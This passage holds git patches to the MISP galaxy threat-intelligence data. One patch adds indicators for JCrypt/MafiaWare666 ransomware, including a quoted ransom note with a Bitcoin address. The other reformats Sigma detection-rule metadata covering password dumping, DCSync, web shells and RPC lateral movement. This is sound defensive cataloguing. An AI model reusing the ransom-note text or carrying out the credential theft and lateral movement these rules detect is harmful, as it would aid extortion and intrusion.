From: =?UTF-8?q?J=C3=BCrgen=20L=C3=B6hel?= Date: Fri, 23 Dec 2022 01:44:20 -0600 Subject: [PATCH 04/13] chg: [ransomware] Extends the entry for JCrypt MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Add the reference to MafiaWare666 based on the latest research from the Avast Threat Lab: https://decoded.avast.io/threatresearch/decrypted-mafiaware666-ransomware/ * Add more infos from Andrew Ivanovs the great blog post: https://id-ransomware.blogspot.com/2020/12/jcrypt-ransomware.html Signed-off-by: Jürgen Löhel --- clusters/ransomware.json | 74 ++++++++++++++++++++++++++++++++++++++-- 1 file changed, 71 insertions(+), 3 deletions(-) diff --git a/clusters/ransomware.json b/clusters/ransomware.json index d1f599c..04b1197 100644 --- a/clusters/ransomware.json +++ b/clusters/ransomware.json @@ -24257,9 +24257,77 @@ "value": "Povisomware" }, { - "description": "ransomware", + "description": "Ransomware written in C#. Fortunately, all current versions of the MafiaWare666 ransomware are decryptable. The Threat Lab from Avast has developed a free decryption tool for this malware.", "meta": { - "date": "December 2020" + "date": "December 2020", + "extensions": [ + ".jcrypt", + ".locked", + ".daddycrypt", + ".omero", + ".ncovid", + ".NotStonks", + ".crypted", + ".iam_watching", + ".vn_os", + ".wearefriends", + ".MALWAREDEVELOPER", + ".MALKI", + ".poison", + ".foxxy", + ".ZAHACKED", + ".JEBAĆ_BYDGOSZCZ!!!", + ".titancrypt", + ".crypt", + ".MafiaWare666", + ".brutusptCrypt", + ".bmcrypt", + ".cyberone", + ".l33ch" + ], + "payment-method": "Bitcoin", + "ransomenotes": [ + "All of your files have been encrypted.\nTo unlock them, please send 1 bitcoin(s) to BTC address: 1BtUL5dhVXHwKLqSdhjyjK9Pe64Vc6CEH1 Afterwards,\nI please email your transaction ID to: this.email.address@gmail.com\nThank you and have a nice day! Encryption Log: ..." + ], + "ransomenotes-refs": [ + "https://1.bp.blogspot.com/-OF8CopM3MUw/X-XLjUmRkYI/AAAAAAAAXpY/1mLe136SuT8DuruWJfwIVY5WnVs5B1gcgCLcBGAsYHQ/s943/txt-note.png" + ], + "ransomnotes-filenames": [ + "___RECOVER__FILES__.jcrypt.txt", + "_RECOVER__FILES__.jcrypt.txt", + "___RECOVER__FILES__.locked.txt", + "___RECOVER__FILES__.daddycrypt.txt", + "___RECOVER__FILES__.omero.txt", + "___RECOVER__FILES__.ncovid.txt", + "___RECOVER__FILES__.crypted.txt", + "___RECOVER__FILES__.iam_watching.txt", + "___RECOVER__FILES__.titancrypt.txt", + "_#ODZYSKAJ_PLIKI--.JEBAĆ_BYDGOSZCZ!!!.txt" + ], + "refs": [ + "https://id-ransomware.blogspot.com/2020/12/jcrypt-ransomware.html", + "https://twitter.com/kangxiaopao/status/1342027328063295488?lang=en", + "https://twitter.com/demonslay335/status/1380610583603638277", + "https://decoded.avast.io/threatresearch/decrypted-mafiaware666-ransomware/", + "https://files.avast.com/files/decryptor/avast_decryptor_mafiaware666.exe" + ], + "synonyms": [ + "RIP lmao", + "Locked", + "Daddycrypt", + "Omero", + "Crypted", + "Ncovid", + "NotStonks", + "Iam_watching", + "Vn_os", + "Wearefriends", + "MALWAREDEVELOPER", + "MALKI", + "Poison", + "Foxxy", + "Mafiaware666" + ] }, "uuid": "dd5712e1-efa8-4054-a5df-fdfdbc9c25b6", "value": "JCrypt" @@ -24861,5 +24929,5 @@ "value": "Karakurt" } ], - "version": 111 + "version": 112 } From 9955401791a8f4cf96751eba95f5932ae0213724 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Fri, 6 Jan 2023 15:13:35 +0100 Subject: [PATCH 05/13] chg: [sigma] jq all the things --- clusters/sigma-rules.json | 126522 +++++++++++++++++------------------ galaxies/sigma-rules.json | 2 +- 2 files changed, 63262 insertions(+), 63262 deletions(-) diff --git a/clusters/sigma-rules.json b/clusters/sigma-rules.json index a94cb72..39ca38c 100644 --- a/clusters/sigma-rules.json +++ b/clusters/sigma-rules.json @@ -1,63262 +1,63262 @@ { - "authors": [ - "@Joseliyo_Jstnk" - ], - "category": "rules", - "description": "MISP galaxy cluster based on Sigma Rules.", - "name": "Sigma-Rules", - "source": "https://github.com/jstnk9/MISP/tree/main/misp-galaxy/sigma", - "type": "sigma-rules", - "uuid": "9cf7cd2e-d5f1-48c4-9909-7896ba1c96b2", - "values": [ - { - "description": "Detects a highly relevant Antivirus alert that reports an exploitation framework", - "uuid": "238527ad-3c2c-4e4f-a1f6-92fd63adb864", - "value": "Antivirus Exploitation Framework Detection", - "meta": { - "refs": [ - "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_exploiting.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203", - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2018/09/09", - "filename": "av_exploiting.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "antivirus", - "logsource.product": "No established product" - } - }, - { - "description": "Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool", - "uuid": "fa0c05b6-8ad3-468d-8231-c1cbccb64fba", - "value": "Antivirus Hacktool Detection", - "meta": { - "refs": [ - "https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_hacktool.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204" - ], - "creation_date": "2021/08/16", - "filename": "av_hacktool.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "antivirus", - "logsource.product": "No established product" - } - }, - { - "description": "Detects a highly relevant Antivirus alert that reports a password dumper", - "uuid": "78cc2dd2-7d20-4d32-93ff-057084c38b93", - "value": "Antivirus Password Dumper Detection", - "meta": { - "refs": [ - "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/", - "https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619/detection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_password_dumper.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1558", - "attack.t1003.001", - "attack.t1003.002" - ], - "creation_date": "2018/09/09", - "filename": "av_password_dumper.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "antivirus", - "logsource.product": "No established product" - } - }, - { - "description": "Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 .", - "uuid": "6fe1719e-ecdf-4caf-bffe-4f501cb0a561", - "value": "Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection", - "meta": { - "refs": [ - "https://twitter.com/mvelazco/status/1410291741241102338", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_printernightmare_cve_2021_34527.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1055" - ], - "creation_date": "2021/07/01", - "filename": "av_printernightmare_cve_2021_34527.yml", - "author": "Sittikorn S, Nuttakorn T, Tim Shelton", - "level": "critical", - "falsepositive": [ - "Unlikely, or pending PSP analysis" - ], - "logsource.category": "antivirus", - "logsource.product": "No established product" - } - }, - { - "description": "Detects a highly relevant Antivirus alert that reports ransomware", - "uuid": "4c6ca276-d4d0-4a8c-9e4c-d69832f8671f", - "value": "Antivirus Ransomware Detection", - "meta": { - "refs": [ - "https://www.nextron-systems.com/?s=antivirus", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_ransomware.yml" - ], - "tags": [ - "attack.t1486" - ], - "creation_date": "2022/05/12", - "filename": "av_ransomware.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "antivirus", - "logsource.product": "No established product" - } - }, - { - "description": "Detects an Antivirus alert in a highly relevant file path or with a relevant file name", - "uuid": "c9a88268-0047-4824-ba6e-4d81ce0b907c", - "value": "Antivirus Relevant File Paths Alerts", - "meta": { - "refs": [ - "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_relevant_files.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588" - ], - "creation_date": "2018/09/09", - "filename": "av_relevant_files.yml", - "author": "Florian Roth, Arnim Rupp", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "antivirus", - "logsource.product": "No established product" - } - }, - { - "description": "Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big webshell repo from e.g. github and checking the matches.", - "uuid": "fdf135a2-9241-4f96-a114-bb404948f736", - "value": "Antivirus Web Shell Detection", - "meta": { - "refs": [ - "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", - "https://github.com/tennc/webshell", - "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection", - "https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection", - "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection", - "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection", - "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection", - "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection", - "https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_webshell.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2018/09/09", - "filename": "av_webshell.yml", - "author": "Florian Roth, Arnim Rupp", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "antivirus", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious Django web application framework exceptions that could indicate exploitation attempts", - "uuid": "fd435618-981e-4a7c-81f8-f78ce480d616", - "value": "Django Framework Exceptions", - "meta": { - "refs": [ - "https://docs.djangoproject.com/en/1.11/ref/exceptions/", - "https://docs.djangoproject.com/en/1.11/topics/logging/#django-security", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/django/appframework_django_exceptions.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2017/08/05", - "filename": "appframework_django_exceptions.yml", - "author": "Thomas Patzke", - "level": "medium", - "falsepositive": [ - "Application bugs" - ], - "logsource.category": "application", - "logsource.product": "django" - } - }, - { - "description": "Generic rule for SQL exceptions in Python according to PEP 249", - "uuid": "19aefed0-ffd4-47dc-a7fc-f8b1425e84f9", - "value": "Python SQL Exceptions", - "meta": { - "refs": [ - "https://www.python.org/dev/peps/pep-0249/#exceptions", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/python/app_python_sql_exceptions.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2017/08/12", - "filename": "app_python_sql_exceptions.yml", - "author": "Thomas Patzke", - "level": "medium", - "falsepositive": [ - "Application bugs" - ], - "logsource.category": "application", - "logsource.product": "python" - } - }, - { - "description": "Detects remote RPC calls to create or execute a scheduled task via ATSvc", - "uuid": "0fcd1c79-4eeb-4746-aba9-1b458f7a79cb", - "value": "Remote Schedule Task Lateral Movement via ATSvc", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1053/", - "https://attack.mitre.org/tactics/TA0008/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1053", - "attack.t1053.002" - ], - "creation_date": "2022/01/01", - "filename": "rpc_firewall_atsvc_lateral_movement.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls to read information about scheduled tasks via AtScv", - "uuid": "f177f2bc-5f3e-4453-b599-57eefce9a59c", - "value": "Remote Schedule Task Recon via AtScv", - "meta": { - "refs": [ - "https://attack.mitre.org/tactics/TA0007/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/zeronetworks/rpcfirewall", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml" - ], - "tags": "No established tags", - "creation_date": "2022/01/01", - "filename": "rpc_firewall_atsvc_recon.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks.", - "uuid": "56fda488-113e-4ce9-8076-afc2457922c3", - "value": "Possible DCSync Attack", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1033/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml" - ], - "tags": [ - "attack.t1033" - ], - "creation_date": "2022/01/01", - "filename": "rpc_firewall_dcsync_attack.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR", - "uuid": "5f92fff9-82e2-48eb-8fc1-8b133556a551", - "value": "Remote Encrypting File System Abuse", - "meta": { - "refs": [ - "https://attack.mitre.org/tactics/TA0008/", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_efs_abuse.yml" - ], - "tags": [ - "attack.lateral_movement" - ], - "creation_date": "2022/01/01", - "filename": "rpc_firewall_efs_abuse.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Legitimate usage of remote file encryption" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls to get event log information via EVEN or EVEN6", - "uuid": "2053961f-44c7-4a64-b62d-f6e72800af0d", - "value": "Remote Event Log Recon", - "meta": { - "refs": [ - "https://attack.mitre.org/tactics/TA0007/", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_eventlog_recon.yml" - ], - "tags": "No established tags", - "creation_date": "2022/01/01", - "filename": "rpc_firewall_eventlog_recon.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Remote administrative tasks on Windows Events" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls to create or execute a scheduled task", - "uuid": "ace3ff54-e7fd-46bd-8ea0-74b49a0aca1d", - "value": "Remote Schedule Task Lateral Movement via ITaskSchedulerService", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1053/", - "https://attack.mitre.org/tactics/TA0008/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1053", - "attack.t1053.002" - ], - "creation_date": "2022/01/01", - "filename": "rpc_firewall_itaskschedulerservice_lateral_movement.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls to read information about scheduled tasks", - "uuid": "7f7c49eb-2977-4ac8-8ab0-ab1bae14730e", - "value": "Remote Schedule Task Recon via ITaskSchedulerService", - "meta": { - "refs": [ - "https://attack.mitre.org/tactics/TA0007/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml" - ], - "tags": "No established tags", - "creation_date": "2022/01/01", - "filename": "rpc_firewall_itaskschedulerservice_recon.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR", - "uuid": "bc3a4b0c-e167-48e1-aa88-b3020950e560", - "value": "Remote Printing Abuse for Lateral Movement", - "meta": { - "refs": [ - "https://attack.mitre.org/tactics/TA0008/", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml" - ], - "tags": [ - "attack.lateral_movement" - ], - "creation_date": "2022/01/01", - "filename": "rpc_firewall_printing_lateral_movement.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Actual printing" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls that performs remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.", - "uuid": "68050b10-e477-4377-a99b-3721b422d6ef", - "value": "Remote DCOM/WMI Lateral Movement", - "meta": { - "refs": [ - "https://attack.mitre.org/tactics/TA0008/", - "https://attack.mitre.org/techniques/T1021/003/", - "https://attack.mitre.org/techniques/T1047/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.003", - "attack.t1047" - ], - "creation_date": "2022/01/01", - "filename": "rpc_firewall_remote_dcom_or_wmi.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Some administrative tasks on remote host" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls to modify the registry and possible execute code", - "uuid": "35c55673-84ca-4e99-8d09-e334f3c29539", - "value": "Remote Registry Lateral Movement", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1112/", - "https://attack.mitre.org/tactics/TA0008/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml" - ], - "tags": [ - "attack.lateral_movement" - ], - "creation_date": "2022/01/01", - "filename": "rpc_firewall_remote_registry_lateral_movement.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Remote administration of registry values" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls to collect information", - "uuid": "d8ffe17e-04be-4886-beb9-c1dd1944b9a8", - "value": "Remote Registry Recon", - "meta": { - "refs": [ - "https://attack.mitre.org/tactics/TA0007/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml" - ], - "tags": "No established tags", - "creation_date": "2022/01/01", - "filename": "rpc_firewall_remote_registry_recon.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Remote administration of registry values" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-SRVS", - "uuid": "b6ea3cc7-542f-43ef-bbe4-980fbed444c7", - "value": "Remote Server Service Abuse", - "meta": { - "refs": [ - "https://attack.mitre.org/tactics/TA0008/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml" - ], - "tags": [ - "attack.lateral_movement" - ], - "creation_date": "2022/01/01", - "filename": "rpc_firewall_remote_server_service_abuse.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Legitimate remote share creation" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR", - "uuid": "10018e73-06ec-46ec-8107-9172f1e04ff2", - "value": "Remote Server Service Abuse for Lateral Movement", - "meta": { - "refs": [ - "https://attack.mitre.org/tactics/TA0008/", - "https://attack.mitre.org/techniques/T1569/002/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1569.002" - ], - "creation_date": "2022/01/01", - "filename": "rpc_firewall_remote_service_lateral_movement.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Administrative tasks on remote services" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls to create or execute a scheduled task via SASec", - "uuid": "aff229ab-f8cd-447b-b215-084d11e79eb0", - "value": "Remote Schedule Task Lateral Movement via SASec", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1053/", - "https://attack.mitre.org/tactics/TA0008/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1053", - "attack.t1053.002" - ], - "creation_date": "2022/01/01", - "filename": "rpc_firewall_sasec_lateral_movement.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls to read information about scheduled tasks via SASec", - "uuid": "0a3ff354-93fc-4273-8a03-1078782de5b7", - "value": "Recon Activity via SASec", - "meta": { - "refs": [ - "https://attack.mitre.org/tactics/TA0007/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml" - ], - "tags": "No established tags", - "creation_date": "2022/01/01", - "filename": "rpc_firewall_sasec_recon.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.", - "uuid": "65f77b1e-8e79-45bf-bb67-5988a8ce45a5", - "value": "SharpHound Recon Account Discovery", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1087/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml" - ], - "tags": [ - "attack.t1087" - ], - "creation_date": "2022/01/01", - "filename": "rpc_firewall_sharphound_recon_account.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.", - "uuid": "6d580420-ff3f-4e0e-b6b0-41b90c787e28", - "value": "SharpHound Recon Sessions", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1033/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183", - 